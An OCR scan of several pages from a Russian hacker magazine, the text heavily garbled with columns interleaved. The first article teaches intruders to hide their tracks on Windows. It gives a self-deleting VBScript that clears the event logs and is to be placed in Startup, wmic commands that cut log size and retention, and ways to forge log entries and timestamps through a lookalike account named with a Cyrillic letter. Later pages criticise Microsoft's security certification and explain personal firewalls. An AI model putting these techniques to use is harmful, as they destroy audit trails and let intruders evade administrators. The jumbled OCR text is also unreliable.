ратил внимание на 


вый файл с расширением WSF после 
ХМЕ-конструкции в начале: 


<?xml version="1.0" encoding="windows- 
1251"?> 


ращаться Ha "попользованную" сис- 
тему и нет желания вдаваться в под- 
робности, то акт приравнивания к ну- 
лю объема сфайла журнала можно 
считать прощальным хлопком 


стандартную концовку. Хеппи-эна вы- <] 06 id="T1"> дверью, что будет ощутимым ударом 
делялся в этом отчете полным отсут- <script language="VBScript"> по изнеженным нервам системщика. 
ствием каких-пибо подробностей, хотя <I[CDATAL Тому, кто планирует периодически 
все остальное было описано четко и навещать понравившуюся систему, 
внятно, с примерами команд, а в неко- и разумнее было бы ограничить коли- 
торых местах - и со скриншотами. чество информации, хранимой в ло- 
Можно было подумать, что чистка ло- |p гах, по объему или числу прошедших 
гов - настолько простое занятие, что </script> дней. Это можно сделать с помощью 
доступно любому пользователю, про- </job> командной строки, получив доступ к 
шедшему недельные курсы и научив- свойствам журнала событий с по- 
шемуся после них отличать клавишу в конце. мощью псевдонима NTEVENTLOG. 
CTRL от SHIFT. Так что же представля- Для начала откроем окно командной 
ет собой на самом деле чистка логов? НАШ ВЫБОР консоли: Пуск -> Выполнить - “ста”. 


Для чистки используются всевоз- 
можные логвайперы и руткиты, и ис- 
пользуются они преимущественно в 
Linux-cuctemax. Но этот номер посвя- 
щен МИп-системам, которые, кстати, 
могут вести логи не хуже пингвинооб- 
разных осей. Вся работа будет прово- 
диться средствами, встроенными в са- 
му систему, так что практически ника- 
кого стороннего сосфта нам не понадо- 
бится. 


WSH - ВСТРОЕННАЯ СИСТЕМА 
АВТОМАТИЗАЦИИ 

m По функциональным возможнос- 
Tam WSH (Windows Script Host) может 
успешно потягаться с консольными 
скриптами Linux, значительно превос- 
ходя их по простоте создания. В каче- 
стве инструмента разработки подой- 


и Если слишком буквально пони- 
мать призыв «чисти логи!», то на 
программирование уйдет не более па- 
ры минут. 

Сценарий, который можно видеть на 
врезке, достаточно поместить в папку 
«Автозагрузка». Результатом будет 
кристальная чистота журнала (или 
журналов - кому как нравится) собы- 
тий и скрупулезный поиск багов, троя- 
нов и прочих mallware админом на 
почве обостренной подозрительнос- 
ти. Впрочем, если нет желания возв- 


Затем запустим программу, позволяю- 
щую работать с WMI через командную 
строку, используя псевдонимы: 
«wmic». Для изменения нужных пара- 
метров наберем команды: 


NTEVENTLOG WHERE 
LogFileName="Application” SET 
MaxFileSize=65536 


(для задания максимального разме- 
ра файла журнала «Приложение» в 
64 килобайт). 


ОЧИЩАЕМ ЖУРНАЛЫ СОБЫТИЙ 


'Выбирается журнал событий 
LogType = “Application” "Приложение 
‘LogType = “System” "Безопасность 


Для загруз- дет любой текстовый редактор. Сцена- ‘LogType = “Security” "Система 

ки вирту- рии готовы к работе сразу же после ‘Подключается к пространству WMI - одной строкой! 
НЕ т написания, если WSH не отключены Set Eventlog = 

ROM необ- на данном компьютере и поддержива- GetObject(“winmgmts:{impersonationLevel=impersonate}").ExecQuery(“select *from 
be etd eal ются операционной системой. Nogge- Win32_NTEventLogFile where Logfilename="" & LogType & “"”) 
альный ржка скриптов присутствует в 'Очищаются выбранные журналы 

ви Windows начиная с 98-й версии (для For each Entry in EventLog 

это делает- более ранних версий ОС сервер сце- Entry.ClearEventlog() 

ся нажати- нариев устанавливается отдельно), Next 

ese которой логи He снились в самом кош- 'И завершающие штрихи - скипт стирает сам себя. 
чальной марном сне. Возможности и синтаксис Scriptname=wscript.scriptfullname 


заставке) и 
в меню boot 


VBScript рассмотрены достаточно под- 
робно в прошлых номерах журнала, 


set fso=CreateObject("Scripting.FileSystemObject") 


fso.Getfile(Scriptname).Delete 


BbITAHYTb 
laa на- поэтому упомянем лишь о том, что ‘Завершение работы сценария 


код сценария помещается в тексто- 
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Wscript.Quit 


ЕЕ ВЕ as ны 


Измененные параметры в действии 


Eventcreate позволяет вносить записи в 
поги из команоной строки. 


NTEVENTLOG WHERE LogFileName=" 
System” SET OverwriteOutDated=1 


(для задания максимального срока 
хранения записей журнала «Система» 
в1 день). 

Кроме изменения настроек, псевдо- 
ним NTEVENTLOG позволяет просмот- 
реть все свойства выбранного журна- 
ла событий: 

NTEVENTLOG WHERE 
LogFileName="Application” GET /VALUE 


Если требуется «интеллектуальное» 
изменение настроек без участия че- 
ловека, то нетрудно и написать обо- 
лочку-сценарий для этой команды. 
Один из вариантов такой оболочки 
показан во врезке. 


УНИКАЛЬНЫЙ ПОЧЕРК ИЛИ 
ОПАСНАЯ УЛИКА? 

м По привычке руки набивают знако- 
мые \/В5спрЕ-операторы, в результате 
чего возникает сценарий, вносящий в 
журналы системы нужные записи. 

Закончив любование проделанной 
работой, я захотел проверить ее ре- 


Такой источник нам не нужен 


зультаты. Каково же было разочаро- 
вание, когда в столбце журнала «Ис- 
точник» («Source Туре») обнаружи- 
лось разоблачающее взломщика зна- 
чение «WSH». Панику смягчало лишь 
отсутствие указания на юзера, внес- 
шего запись «Пользователь» - «Н/А» 
(«User Name» - «М/А»). Нужно было 
искать другой путь. И он был найден. 


ОПЕРАЦИОННАЯ СИСТЕМА ДЛЯ 
ХАКЕРА 

м Из глубин подсознания нахлыну- 
ли давние воспоминания. Робко прос- 
матриваю справочную систему 
Windows и нахожу в справочнике по 
командной строке неприметную, но не 
менее от этого важную команду event- 
create, с помощью которой можно вно- 
сить записи в журналы событий не- 
посредственно из командной строки. 

Основное преимущество вышеука- 
занной команды перед сценариями 
WSH - возможность напрямую ука- 
зать имя источника и пользователя. 
Правда, пользователь должен суще- 
ствовать, и пароль его должен быть 
известен. Кроме того, системные ис- 
точники вроде «Userenv» или 


Интересная учетная запись 


«Msilnstaller» заблокированы, а BHO- 
сить запись от имени пользователя 
«System» не представляется возмож- 
ным. Выдается сообщение «Ошибка: 
исходный параметр используется 
только для определения приложения 
или сценария (невстроенные источ- 
ники)». Но, к счастью, для этой проб- 
лемы есть решение, которое лежит 
на поверхности. Суть в том, что неко- 
торые символы латинского и кирил- 
лического алфавита имеют практи- 
чески одинаковый вид (по крайней 
мере, в шрифтах Windows), но разные 
коды. «А» латинское и «А» кирилли- 
ческое - не одно и то же, хотя и выг- 
лядят одинаково. Если создание 
учетной записи «System» невозмож- 
но, то пользователь «System» (с ки- 
риллической «е») добавляется на 
«Ура». После создания учетной запи- 
си отее имени можно вносить собы- 
тия в системный журнал, а затем уда- 
лять в целях конспирации. Аналогич- 
ная подмена действует и на указание 
«Источника». 

Остается еще одна проблема - дата 
и время внесения записи. На самом 
деле, при наличии прав Администра- 
тора это далеко не проблема, а, ска- 
жем так, небольшое препятствие. Все 
решается обычным переводом кален- 
даря и часов, что вполне осуществи- 
мо средствами командной строки и 
сценариев. 


Имитация источника записи «Userenv» заменой латинской 


«е» на кириллическую 
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+ И наслаждаемс: 


АТАКА HA WINDOWS 


wn 
= 
о 
[= 
z 
= 
< 
= 
< 
4 
< 
- 
< 


БОРТОВОЙ ЖУРНАЛ ) 


НЫ 


Один и тот 
же диско- 
вый образ 
может быть 
подключен 
к несколь- 
ким вирту- 
альным ма- 
шинам - 
удобно для 
передачи 
файлов 
между ними 
или совме- 
стного ис- 
пользова- 
ния прило- 
жений. 


Все описы- 
ваемые 
эмуляторы 
ты найдешь 
на нашем 
диске. 


Как резюме ко всему здесь написан- 
ному. Схематично процедура удале- 
ния записи об определенных событи- 
ях выглядит так: 

ш Сохранение некоторых записей 
журнала событий в отдельный источ- 
НИК 

m Создание учетных записей со спе- 
цифическими именами 

mw Очистка журнала событий 

ш Считывание записей из архива 

ш Изменение дат и времени и внесе- 
ние считанных записей 

m Удаление временных учетных за- 
писей 

ш Удаление архива записей 

ш Установка текущей даты и времени 


ОТСЛЕЖИВАЕМ СОБЫТИЯ В 
РЕАЛЬНОМ ВРЕМЕНИ 

ш Несмотря на кажущуюся простоту 
описанного способа иногда манипу- 
ляции с логами не имеют большого 
смысла, а, скорее, напоминают борь- 
бу с симптомами заболевания, вместо 
выяснения и удаления причины 6o- 
лезни. Многие записи в журналы со- 
бытий вносятся благодаря настрой- 
кам параметров локальной политики. 
Изменение локальной политики есть 
не что иное, как редактирование ре- 
естра в комфортной обстановке, то 
есть через консоль ММС. В этом лег- 
ко убедиться, если одновременно с 


ВНОСИМ ЗАПИСИ В ЛОГИ 
САМИ 


'Объявляются используемые 
переменные 

Option Explicit 

Dim WshShell, LEvent 

Dim Ltype,LMsgevent,Lcomputer 

‘Ltype -Kog типа события 

'0 - Успех (Success) 

"| - Ошибка (Error) 

'2 - Предупреждение (Warning) 

'4 - Уведомление (Information) 

'8 - Аудит успехов (Audit_Sucess) 

16 - Аудит отказов (Audit_Failure) 

'LMsgevent - Текстовое сообщение 

‘Lcomputer - Дополнительный 
параметр, указывающий имя 
компьютера для записи события на 
удаленной машине 

Ltype =2 

LMsgevent = "Настрой фаервол!" 

'Получается доступ к системным 
объектам 

Set 
WshShell=CreateObject("WScript.Shell") 

'Вносится запись 

LEvent=WshShell.LogEvent(Ltype,LMsge 
vent) 

'Завершение работы сценария 

Wscript.Quit 


правкой политик безопасности вос- 
пользоваться средством мониторинга 
реестра, например RegFix. Изменен- 
ные параметры можно сохранить и в 
будущем править с помощью команд- 
ных файлов и сценариев WSH. 
Большую опасность представляют 
приложения и сервисы, имеющие 
свою собственную систему докумен- 
тирования событий, иногда gyOnupy- 
ющую записи в стандартные логи 
Windows. Также помимо пассивной 
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регистрации произошедших измене- 
ний могут производиться конкретные 
действия, например, отправка SMS 
или ICQ системному администратору. 
Однако и злой взломщик может не 
остаться в долгу, запустив сценарий, 
отслеживающий появление в логах 
записей определенного типа. 

Альтернативой этому \\/5Н-сцена- 
puto служит СМО-команда eventtrig- 
gers, которая создает в операцион- 
ной системе так называемые тригге- 
ры, отслеживающие выполнение оп- 
ределенных условий в журнале со- 
бытий и действующие в соответ- 
СТВИИ С НИМИ. 

Пример создания триггера, взятый 
из справочного файла: 


eventtriggers /create /s srvmain /u main- 
dom\hiropin /р p@ssW23 /tr "Отсутствие 
места на диске" /eid 4133 /t warning /tk 
\\server\share\diskcleanup.cmd 


ЗА КАДРОМ 

и В статье, по причине ее ограни- 
ченного объема, не указан способ 
копирования записей из системных 
журналов в текстовый файл. Один 
из вариантов сценария, реализую- 
щего эти возможности, можно найти 
на прилагающемся к журналу диске, 
хотя лучшим примером, на мой 
взгляд, будет входящий в Windows 
XP Professional сценарий event- 
query.vbs, на который, кстати, pacn- 
ространяется защита системных 
файлов. SE 


ОТСЛЕЖИВАЕМ 
ПОЯВЛЕНИЕ В ЛОГАХ 
ОПРЕДЕЛЕННОЙ ЗАПИСИ 


'Объявляются используемые 
переменные 

Option Explicit 

Dim WshShell, LEvent 

Dim Ltype,LMsgevent,Lcomputer 

'Ltype -Kog типа события 

'0 - Успех (Success) 

"| - Ошибка (Error) 

'2 - Предупреждение (Warning) 

'4 - Уведомление (Information) 

'8 - Аудит успехов (Audit_Sucess) 

16 - Аудит отказов (Audit_Failure) 

'LMsgevent - Текстовое сообщение 

‘Lcomputer - Дополнительный 
параметр, указывающий имя 
компьютера для записи события на 
удаленной машине 

Ltype =2 

LMsgevent = "Настрой фаервол!" 

'Получается доступ к системным 
объектам 

Set 
WshShell=CreateObject("WScript.Shell") 

'Вносится запись 

LEvent=WshShell.LogEvent(Ltype,LMsge 
vent) 

'Завершение работы сценария 

Wscript.Quit 
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В последнее время Microsoft неустанно твердит о повышении уровня защищенности своей продукции, в особенности 
№) операционных систем Windows 2003 и Windows ХР. Специалисты компании размахивают бумагами с печатями, 
якобы подтверждающими безопасность творений М$. Какова на самом деле цена этих бумаг? 


—_ ертификация - это не- 


зависимая экспертиза 


и подтверждение со- 


ответствия некоторым 
требованиям. В облас- 
ти безопасности сертификация бы- 
вает двух типов: для людей и для 
программ. Пощупаем последнее. За- 
ветная бумага является результатом 
долгого и непростого процесса про- 
верки кодов программного обеспе- 
чения на соответствие формализо- 
ванным критериям безопасности. 
Процесс этот длительный, дорогой и 
требует участия высококвалифици- 
рованных специалистов. 


0 ПРОЦЕССЕ 

m= В чем отличие обычного бета- 
тестирования от тестирования по 
безопасности, завершающегося 
выдачей сертификата? В подходе. 
В первом случае ищут ошибки, при- 
водящие к сбоям и некорректной 
работе тестируемой программы, и 
просто орфографические ошибки в 
меню и справке. Но на безопас- 
ность эти ошибки влияют мало. Бо- 
лее того, программа может рабо- 
тать идеально, но быть абсолютно 
незащищенной. Представь, что 
программа шифрования РСР хра- 
нит секретный ключ шифрования в 
корне диска С: и этот ключ вычис- 
ляется за пару секунд на обычной 
персоналке. По бета-тестированию, 
в этом нет ничего предосудитель- 
ного. А вот с точки зрения тестиро- 
вания на безопасность это ключе- 
вые дыры, сводящие Ha нет эфорек- 
тивность тестируемой системы. 


0 КРИТЕРИЯХ 

ш Система обычно тестируется не 
случайным образом, а на соответ- 
ствие заранее определенным кри- 
териям по четкой методике. В Рос- 
сии сейчас действует два набора 
таких критериев: уже устаревшие 
Руководящие документы Гостехко- 
миссии и так называемые "Общие 
критерии", введенные в действие с 
1 января 2004 года. В этих доку- 
ментах прописаны требования к 
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Ш Почему нельзя проверить все возможные конфигурации тести- 
руемой системы? Вспомни школьный курс комбинаторики. У сис- 
темы с 10 настройками по 2 возможных варианта будет 1024 раз- 
личных конфигураций. У системы с 20 настройками по 2 возмож- 


ных варианта будет 1048576 различных конфигураций. Теперь 

представь, что настроек несколько сотен и для каждой число воз- 
можных вариантов больше 2. Можно ли проверить все состояния 
работы такой системы? 


Сертисдфикационная лаборатория получит 
деньги за проверку, производитель получит 
заветную бумагу. 


механизмам защиты, обязанным 
присутствовать в тестируемых 
средствах. Документов, входящих 
в "Общие критерии", много. Это бо- 
лее десятка профилей защиты под 
каждый из распространенных клас- 
сов программных средств: операци- 
онные системы, базы данных, меж- 
сетевые экраны (firewall) и т.д. Py- 
ководящие документы Гостехко- 
миссии классифицировались ана- 
логично. Но сейчас подход стал бо- 
лее гибким. Если видно, что под 
конкретный профиль ты не подпа- 
даешь, то можно создать задание 
по безопасности, в котором ука- 
жешь только те требования, на со- 
ответствие которым ты и будешь 
тестировать свою систему. 

Но такой подход несет в себе оче- 
видную угрозу: производитель мо- 
жет, например, написать задание, в 
котором будет всего одно требова- 
ние, и проводить тестирование на 
соответствие ему. Сертификацион- 
ная лаборатория получит деньги за 
проверку, производитель получит 
заветную бумагу. Только потребите- 
ля никто не будет спрашивать, уст- 
раивает ли его дырявый сорт. А сам 
он проверить его, к сожалению, ока- 
жется не в состоянии. 


CERTIFIED 


С Windows XP произошла именно 
такая ситуация. Не имея возмож- 
ности сертифицировать по высо- 
кому классу защиты, Microsoft 
разработала свое задание по бе- 
зопасности и провела сертифика- 
цию Windows XP Professional 
Service Pack 1a "на соответствие 
реализованных в операционной 
системе функций защиты и задек- 
ларированных в задании по безо- 
пасности". Вдумайся в эту форму- 
лировку. Тестировались не меха- 
низмы защиты, а соответствие их 
реального наличия номенклатуре, 
указанной в документации. Можно 
ли удивляться тому, что с момента 
получения сертификата в 
Windows ХР в начале этого года 
было обнаружено на момент напи- 
сания этой статьи 37 дыр (по дан- 
ным Security Focus). 

Еще один аспект, связанный с "Об- 
щими критериями". В них вводится 
такое понятие, как "модель угроз", 
или "модель нарушителя". Ты про- 
веряешь не просто наличие меха- 
низмов защиты, а возможность их 


эффективной работы по преодоле- 
нию конкретных угроз, которые мо- 
гут быть направлены на защищае- 
мую систему. Очевидно, что чем 
больше угроз, тем сложнее подсис- 
тема защиты и процесс ее проверки 
и сертификации. Microsoft и тут от- 
личилась. Смотрим задание по безо- 
пасности (в котором и прописывает- 
ся эта самая модель угроз) на ОС 
Windows 2000. Что же мы видим? OT 
каких угроз защищает Windows 
2000 (по мнению Microsoft)? Ux все- 
го 9 (1): 

ш фальсификация или потеря со- 
бытий, хранимых в журнале регист- 
рации; 

ш фальсификация или потеря 
конфигурационных и иных критич- 
ных данных; 

ш несанкционированный доступ к 
данным, оставшимся от предыдущих 
пользователей (например, в файле 
подкачки или временных файлах); 

ш маскировка под авторизованно- 
го пользователя; 

ш несанкционированный доступ к 
системе с правами администратора; 

ш несанкционированный доступ к 
системным данным; 

ш модификация подсистемы защи- 
ты OC; 

ш вывод из строя системы регист- 
рации событий; 

ш фальсификация пользова- 
тельских данных. 

Стоит ли комментировать этот "ог- 
ромный" список? Почему именно от 
этих угроз защищена Windows 
2000? Может, потому, что это было 
проще всего сделать? В модели на- 
рушителя сертифицированной 
Windows XP еще меньше угроз - 5. 
Ро5-атаки вообще не рассматрива- 
ются как угроза для операционной 
системы М5. 

В ограничениях к сертификату 
четко написано, что Microsoft не не- 
сет ответственности за все, что тво- 


Ш Число строк кода в разных версиях Windows: 


- Windows 2000 - 35 миллионов 
- Windows ХР - 50 миллионов 


По данным института Карнеги-Меллона, на 1000 строк кода прог- 
раммы приходится от 5 до 15 ошибок, которые никак не проявля- 
ются и не нарушают функционирования системы. 


Особенность сертисрикации Windows 2000 в 
том, что проверке подвергается не только 
ОС, но и компьютер. 


рится за пределами Windows 2000. 
Перехват трафика? Пожалуйста. 
Утечка через инфракрасный порт, 
Bluetooth, Wi-Fi-agantep или flash- 
диск? Пожалуйста. Кстати, nocneg- 
ние три периферийных устройства 
вообще не указаны в списке разре- 
шенных на сертифицированных ма- 
шинах Windows 2000. Хорошо, что 
хоть сетевую карту можно исполь- 
зовать :). А то получилось бы как с 
сертификатом на Windows МТ 3.51. 
"Защитный" сертификат был, но... 
только при условии отсутствия дис- 
KOBOQOB и сетевой карты. И кому 
был нужен такой защищенный 
компьютер? Более того, в ограниче- 
ниях также указано, что все компь- 
ютеры, с которыми может взаимо- 
действовать сертифицированный 
экземпляр Windows, могут нахо- 
диться только в контролируемой 
зоне (это в интернете-то?), на них 
должны распространяться те же са- 
мые требования политики безопас- 
ности, а их пользователи должны 
пройти проверку на благонадеж- 
ность. Совсем оторванные от жизни 
требования! 


За время, требуемое на сертификацию, 
операционная система 
успевает обновиться 


Ш Вот что мы читаем на официальном сайте Гостехкомиссии 
(www.gostexkom.ru): «Государственная техническая комиссия 
России является федеральным органом исполнительной власти, 
осуществляющим межотраслевую координацию и функциональ- 
ное регулирование деятельности по обеспечению защиты (нек- 


риптографическими методами) информации, содержащей сведе- 
ния, составляющие государственную или служебную тайну, от ее 
утечки по техническим каналам, от несанкционированного досту- 
па к ней, от специальных воздействий на информацию и по проти- 
водействию техническим средствам разведки на территории Рос- 


сийской Федерации». 


На мгновение представь невоз- 
можное: соблюдены все ограниче- 
ния, и Windows 2000 защищена от 
угроз, не покрываемых сертидфика- 
том. Радостно потирая руки, ты счи- 
таешь, что теперь твоя сеть надеж- 
но защищена, ибо это подтверждено 
сертификатом. Рано радоваться. 
Особенность сертификации Windows 
2000 в том, что проверке подверга- 
ется не только ОС, но и компьютер, 
на которую она устанавливается. А, 
следовательно, установка W2k на 
любую другую железку приводит к 
аннулированию сертификата, в ко- 
тором четко прописаны модели 
компьютеров: Compag Proliant 
ML570 u ML330, Compaq 
Professional Workstation AP550, Dell 
Optiplex GX400, Dell PE 2500, 
6450, 2550 u 1550. 

И последний подводный камень. 
Можно ли провести серьезную про- 
верку на защищенность без доступа 
к исходным текстам, тем более для 
операционной системы? Ответ ясен. 
Однако Microsoft отличилась и тут. 
Сертификация Windows ХР была 
блестяще проведена без оных, так 
как уровень доверия (еще один тер- 
мин из "Общих критериев") к безо- 
пасности операционной системы не 
предполагал анализа исходных текс- 
тов программ. 


0 ВРЕМЕНИ 

и Очевидно, что чем объемней 
анализируемый продукт, тем дольше 
процесс анализа. Первая российс- 
кая сертификация Windows МТ и MS 
SQL Server длилась 3 года, как и 
сертификация Windows 2000 за ру- 
бежом. А вот Windows ХР наши "спе- 
циалисты" освоили за 10 месяцев. 

За время, требуемое на сертисфика- 
цию, операционная система успева- 
ет обновиться одним или двумя 
Service Pack’amu, а также возможен 
вариант, когда появление сертиси- 
ката совпадет с выходом новой вер- 
сии ОС. Например, вполне вероятно, 
что завершение затеянной сертифи- 
кации Windows 2003 по срокам сов- 
падет с выходом Longhorn. 


Осенью 
2003 года 
семь изве- 
стных спе- 
циалистов 
по инфор- 
мационной 
безопаснос- 
ти направи- 
ли в прави- 
тельство 
США док- 
лад, в кото- 
ром говори- 
лось, что 
продукция 
Microsoft 
представля- 
ет угрозу 
националь- 
ной безо- 
пасности. 
Буквально 
сразу после 
публикации 
этого док- 
лада один 
из его авто- 
ров, техни- 
ческий ди- 
ректор 
@Stake Дэн 
Гир, был 
уволен. 


По словам 
Билла Гейт- 
са, компа- 
ния 
Microsoft 
затратила 
500 чело- 
веко-лет на 
то, чтобы 
сделать 
Windows 
2000 6e30- 
пасной и 
надежной 
операцион- 
ной систе- 
мой. 
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По данным 
SANS 
Internet 
Storm 
Center 
(www.isc.sa 
ns.org), 
среднее 
время меж- 
gy подклю- 
чением не- 
патченой 
машины с 
Windows к 
интернету и 
go момента 
атаки на 
нее или за- 
ражения 
червем сос- 
тавляет 
всего 16 ми- 
нут. 


Сертификат 
№844, вы- 
данный по 
результа- 
там серти- 
фикацион- 
ных испы- 
таний, 
подтверж- 
дает, что 
операцион- 
ная система 
Microsoft 
Windows XP 
Professional 
(Service 
Pack 1a) со- 
ответствует 
заданию по 
безопаснос- 
ти 
MS.Win_XP_ 
SP1a.3B5 и 
имеет оце- 
ночный 
уровень go- 
верия ОУД1, 
усиленный 
компонен- 
том 
AVA_SOF.1. 


СЕРТИФИКАЦИЯ ПРОГРАММ OT MICROSOFT ) 


0 ЛЮДЯХ 

m Все, даже самые серьезные, ме- 
ханизмы защиты не способны про- 
тивостоять человеческой глупости 
и некомпетентности. Будешь хра- 
нить секретные ключи в корневом 
разделе диска или выберешь пус- 
той пароль для своей учетной запи- 
си, и безопасность самой надежной 
и сертифицированной системы бу- 
дет равна нулю :). 

А кто проводит сертификацию? 
Те же люди, которые хотят полу- 
чать достойную зарплату и квали- 
фикация которых должна быть не 
ниже той, которой обладают раз- 
работчики тестируемого ПО. Дос- 
таточно интересна дискуссия, раз- 
вернувшаяся на форуме сайта 
5ес.ги. В ней сотрудник сертифика- 
ционной лаборатории делится сек- 
ретами своей кухни, из чего стано- 
вится ясно, как проводится у нас 
сертификация и чего стоят полу- 
ченные сертификаты. 


ИСТОРИЯ ВОПРОСА 

ш В России Microsoft уже неоднок- 
ратно проходила по этой дорожке. 
Первый раз это произошло в дале- 
ком 1999 году, когда российское 
представительство программного 
гиганта сертифицировало 3 своих 
продукта: Windows NT Server 4.0, 
Windows NT Workstation 4.0 и MS 
SQL Server 6.5. Работа эта велась в 
интересах Минатома России в рам- 
ках соглашений с Министерством 
Энергетики США по контролю за не- 
распространением ядерных матери- 
алов. Сей процесс длился 3 года и 
завершился 18 марта 1999 года по- 
лучением сертификатов Гостехко- 
миссии России. 


Ш Число дыр в уже сертифицированных версиях Windows (по 
данным Security Focus на момент написания статьи): 


- Windows МТ Workstation - 107 
- Windows NT Server - 117 


- Windows 2000 Professional - 97 


- Windows 2000 Server - 45 


- Windows 2000 Advanced Server - 103 


- Windows XP Professional - 37 


12 cbeBpans этого года сертификация 
Windows ХР была успешно завершена, а 
сертификация Windows 2003 продолжается. 


Надо сказать, что гораздо раньше 
Windows МТ 3.51 была сертифициро- 
вана в Америке по уровню C2, но, 
учитывая «распространенность» 
этой версии в России, можно о ней 
смело забыть. 

В конце октября 2002 года корпо- 
рация Microsoft объявила о получе- 
нии платформой Microsoft Windows 
2000 (Professional, Server и 
Advanced Server) сертификата Ha со- 
ответствие западной редакции «Об- 
щих критериев». Сертификация шла 
около 3 лет. 

27 марта прошлого года был начат 
процесс сертификации Windows ХР 
и Windows 2003 Server на соответ- 
ствие «Общим критериям». 12 фев- 
раля этого года сертификация 
Windows ХР была успешно заверше- 
на, а сертификация Windows 2003 
продолжается. Зная сроки сертидри- 


Все, даже самые серьезные, механизмы 
защиты не способны противостоять 
человеческой глупости и некомпетентности. 


Ш www.sec.ru/forum2__1.cfm?posa=1&stpa=10&threadid= 
716&read=1&stp=20&pos=1& - обсуждение российской системы 
сертификации. 
Ш www.niap.nist.gov/cc-scheme - все об «Общих критериях». 
Ш www.altx.ru - сайт строительной компании «Алтэкс-Строй», 
занимающейся послепродажным обслуживанием 


сертифицированной OC Windows ХР. 

Ш www.microsoft.com/rus/general/press/1999/march/sertifica- 
tion.htm - сертификация Windows МТ в 1999 году. 

Ш www.microsoft.com/rus/security/articles/common_criteria/ 
intro.mspx - сертификация Windows 2000 в 2002 году. 

Ш www.microsoft.com/rus/news/issue.asp?12-02-2004-win- 
dowsxp.xml - сертификация Windows ХР в 2004 году. 

Ш www.gostexkom.ru - официальный сайт Гостехкомиссии. 
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кации МТи 2000, можно предполо- 
жить, что и Windows 2003 будут про- 
верять не менее 3 лет - ждать оста- 
лось два года :). 


В ИТОГЕ 

m Несмотря на все заявления 
Microsoft о повышении уровня 3a- 
щищенности ее изделий и получе- 
ние ими сертификатов соответствия 
требованиям по безопасности, ситу- 
ация не такая радужная. Некоторые 
всемирно известные специалисты 
(среди них и Брюс Шнайер) обвиня- 
ют компанию, возглавляемую Бил- 
лом Гейтсом, в создании угрозы на- 
циональной безопасности. А кто-то 
идет дальше, сравнивая рост инс- 
талляций OC Windows со стихийным 
бедствием. 

Известная независимая консалтин- 
говая компания Gartner Group 
(www.gartner.com) не осталась в сторо- 
не от этой проблемы и неоднократно 
рекомендовала всем пользователям 
отказаться от решений компании 
Microsoft по причине их низкой за- 
щищенности: 

ш 19 сентября 2001 года - после 
эпидемии Nimda; 

ш 15 мая 2003 года - после обна- 
ружения дыры в Microsoft Passport; 

Ш 12 августа 2004 года - после 3a- 
явления о выпуске Windows ХР 
Starter Edition. 

Призывать к этому, конечно, глу- 
по, так как нет ни одной по-насто- 
ящему защищенной операцион- 
ной системы. Но и рассчитывать, 
что даже сертифицированные эк- 
земпляры этой ОС будут защище- 
ны лучше, чем все остальные, не- 
разумно. Поэтому, как всегда, ос- 
тается надеяться только на себя: 
своевременно патчить систему, 
установить и регулярно обнов- 
лять антивирус и персональный 
межсетевой экран - невзирая на 
«независимые» бумаги и заявле- 
ния производителя о защищен- 
ности его творений. 


* Внашем магазине вас * Постоянно * Чем больше, ВЫБОР 
ждет более 1000 игр обновляемый тем дешевле! 
на ваш выбор ассортимент 


Silent НИ 4: The Room Half-Life 2 Myst IV Revelation 


World of Warcraft Star Wars Galaxies: Final Fantasy XI: Chains EverQuest Il DVD Metal Gear Solid 2: Ultima Online: 
Jump to Lightspeed of Promathia Expansion Substance Samurai Empire 


Играй ЗАБУДЬ ПРО ТЕЛЕЖКИ 


просто! 
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ЗАЩИТА СНАРУЖИ И ИЗНУТРИ ) 


(c)oded by Lame@pochta.ru 


ЗАЩИТА СНАРУЖ 
И ИЗНУТРИ 


днако, как любое cpeg- 


делает только то, что в 


9 ство защиты, фаервол 


него заложил разра- 
ботчик. Вот основные 

функции, которые реализуют персо- 
нальные МСЭ: 

ш фильтрация трасфика на сетевом 
уровне 

ши фильтрация содержимого приклад- 
ных протоколов 

и ограничение сетевой активности 
приложений и контроль утечки данных 


ФИЛЬТРАЦИЯ ТРАФИКА НА 
СЕТЕВОМ УРОВНЕ 

ш Основной защитный механизм, ко- 
торый реализует любой межсетевой 
экран, - фильтрация трафика. Фильт- 
рация предполагает анализ пакетов, 
проходящих с одного интерфейса 
межсетевого экрана на другой, с 
целью проверки на соответствие по- 
литике безопасности. В случае если 
пакет соответствует разрешающему 
правилу, он ретранслируется межсе- 
тевым экраном, иначе - отбрасывает- 
ся. В зависимости от глубины провер- 
ки передаваемых данных, а также кри- 
териев фильтрации различают нес- 
колько типов межсетевых экранов. 
Например, простой пакетный фильтр 
рассматривает каждый пакет отдель- 
но от других и в качестве критериев 
фильтрации использует заголовки 
сетевого и транспортного уровней, то 
есть |Р-адреса отправителя и получа- 
теля, номера TCP/UDP-nopTos ит.д. 
Обмануть такой межсетевой экран - 
все равно, что отобрать у ребенка 
конорету: просто, но стыдно. 

Более продвинутые межсетевые эк- 
раны (stateful) осуществляют фильтра- 
цию в контексте соединения. Они не 
только анализируют дополнительные 
поля заголовков пакетов (такие, как 
состояние срлагов SYN, АСК, FIN, RST и 
значения Sequence Number), но и пом- 
нят их значение для предыдущих паке- 
тов. Поэтому могут отличить «подде- 
ланный» пакет OT тех, которые принад- 
лежат данному разрешенному соеди- 
нению. Большинство персональных 
межсетевых экранов являются, как ми- 
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ПЕРСОНАЛЬНЫЕ ФАЕРВОЛЫ 


нимум, stateful МСЭ для TCP/UDP/ICMP. 
То есть умеют, по крайней мере, разли- 
чать, кто и в каком направлении уста- 
новил соединение, и считать Sequence 
Numbers пакетов. 

Установив персональный межсете- 
вой экран в «правильной» стандарт- 
ной конфигурации, можешь не боять- 
ся злобных червей типа Sasser или 
MSBlast, стучащихся на открытые 
445-й и 135-й порты. Хотя, если чест- 
но, непонятно, зачем оставлять на 
компьютере неиспользуемую сетевую 
службу. Не хочешь ты, чтобы 
CIFS/SMB/NetBIOS (порты 137, 138, 139, 
445) светилось наружу - останови 
службу “Server”. Не нужен тебе 135-й 
порт - привяжи RPC к 127.0.0.1 утили- 
той rpccfg и не мучайся. Нормально 
настроенный пользовательский 
компьютер при сканировании птар 
должен, максимум, отвечать Ha ртд. И 
не потому что на нем стоит фаервол, 
а потому что на нем просто никто не 
слушает сеть. Но чтобы реализовать 
подобное стандартными средствами 
Windows, надо хотя бы знать, что за 
сетевой сост стоит на машине. В то 
время как персональные межсетевые 
экраны разбираются в этом сами. 

Кстати, чтобы определить, какие 
программы слушают сеть на твоей ма- 
шине, совершенно не обязательно ус- 
танавливать программы типа fport 
или activeport. В Windows для этого 
можно воспользоваться двумя коман- 
дами: netstat и tasklist (в ранних вер- 
сиях Windows). Команда netstat -апо 
выдает список сетевых соединений и 
